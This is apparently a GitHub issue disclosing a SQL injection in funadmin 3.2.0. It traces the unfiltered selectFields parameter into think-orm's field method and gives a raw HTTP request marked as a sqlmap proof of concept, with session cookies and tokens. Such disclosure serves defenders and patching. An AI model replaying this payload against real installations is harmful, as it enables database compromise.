You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Vulnerability Product:funadmin
Vulnerability version:.3.2.0
Vulnerability type:sql injection
Vulnerability Details:
Vulnerability location app\backend\controller\member\MemberLevel.php# is called
app\backend\controller\member\Member.php#index method
After getting the parameter selectFields here, continue to enter
selectFields method
app\common\traits\Curd.php#selectList
Finally, enter \vendor\topthink\think-orm\src\db\BaseQuery.php#field is spliced into sql without filtering to cause sql injection
Vulnerability Product:funadmin
Vulnerability version:.3.2.0
Vulnerability type:sql injection
Vulnerability Details:
Vulnerability location app\backend\controller\member\MemberLevel.php# is called
app\backend\controller\member\Member.php#index method
After getting the parameter selectFields here, continue to enter
selectFields method
app\common\traits\Curd.php#selectList
Finally, enter \vendor\topthink\think-orm\src\db\BaseQuery.php#field is spliced into sql without filtering to cause sql injection
Vulnerability reproduction:
Background administrator rights
sqlmap poc
GET /backend/member.memberLevel/index?parentField=pid&selectFields%5Bname%5D=*&selectFields%5Bvalue%5D=id HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Csrf-Token: 57cf5483b08025dc11534643f460d0fc X-Requested-With: XMLHttpRequest Accept-Encoding: gzip
The text was updated successfully, but these errors were encountered: